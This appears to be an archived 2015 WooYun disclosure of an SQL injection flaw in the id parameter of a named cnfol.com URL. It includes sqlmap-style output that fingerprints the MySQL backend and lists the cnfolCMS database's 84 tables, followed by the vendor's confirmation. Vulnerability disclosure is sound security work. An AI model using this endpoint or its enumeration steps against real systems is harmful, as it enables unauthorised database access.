乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-17: 细节已通知厂商并且等待厂商处理中 2015-08-17: 厂商已经确认,细节仅向厂商公开 2015-08-27: 细节向核心白帽子及相关领域专家公开 2015-09-06: 细节向普通白帽子公开 2015-09-16: 细节向实习白帽子公开 2015-10-01: 细节向公众公开
RT
# SQL注入http://shell.cnfol.com/article/recomend_newjson.php?id=1975&record=4&len=22&call=? id=参数存在注入
[09:58:57] [INFO] the back-end DBMS is MySQLweb application technology: Apacheback-end DBMS: MySQL 5.0.12[09:58:57] [INFO] fetching database namesavailable databases [2]:[*] cnfolCMS[*] information_schema
Database: cnfolCMS[84 tables]+-----------------------------+| article_coll || channel_data || cnfol_appclass || cnfol_arcontent || cnfol_arcontent_2011 || cnfol_arcontent_201109 || cnfol_arcontent_201110 || cnfol_arcontent_201111 || cnfol_arcontent_201112 || cnfol_arcontent_2012 || cnfol_arcontent_201206 || cnfol_arcontent_201212 || cnfol_arcontent_2013 || cnfol_arcontent_201302 || cnfol_arcontent_201303 || cnfol_arcontent_201304 || cnfol_arcontent_201305 || cnfol_arcontent_201306 || cnfol_arcontent_201307 || cnfol_arcontent_201308 || cnfol_arcontent_201309 || cnfol_arcontent_201310 || cnfol_arcontent_201311 || cnfol_arcontent_201312 || cnfol_arcontent_2013_all || cnfol_arcontent_2014 || cnfol_arcontent_201401 || cnfol_arcontent_201402 || cnfol_arcontent_201403 || cnfol_arcontent_201404 || cnfol_arcontent_201405 || cnfol_arcontent_201406 || cnfol_arcontent_201407 || cnfol_arcontent_201408 || cnfol_arcontent_201409 || cnfol_arcontent_201410 || cnfol_arcontent_201411 || cnfol_arcontent_201412 || cnfol_arcontent_2014_all || cnfol_arcontent_2015 || cnfol_article || cnfol_article_del || cnfol_attachment || cnfol_block || cnfol_blockgroup || cnfol_blockhistory || cnfol_blockrecommend || cnfol_blockrecommendhistory || cnfol_blockversion || cnfol_category || cnfol_cloudpermission || cnfol_content || cnfol_content_del || cnfol_content_unaudit || cnfol_directory || cnfol_editlimit || cnfol_filterword || cnfol_forward || cnfol_hwitem || cnfol_keyword || cnfol_log || cnfol_menu || cnfol_picture_del || cnfol_picture_group || cnfol_picure || cnfol_releasepoint || cnfol_site || cnfol_source || cnfol_special || cnfol_special_copy || cnfol_special_list || cnfol_specialclass || cnfol_tag || cnfol_tagauditing || cnfol_tagcontent || cnfol_template || cnfol_templateclass || cnfol_urlrule || cnfol_useddirectory || cnfol_watermark || cnfol_workcount || kktest || kktest1 || templateclass |+-----------------------------+
网速不给力.... 证明注入就好..
综上
你会的
危害等级:高
漏洞Rank:20
确认时间:2015-08-17 10:33
感谢提供漏洞信息,我们会立即处理掉。
暂无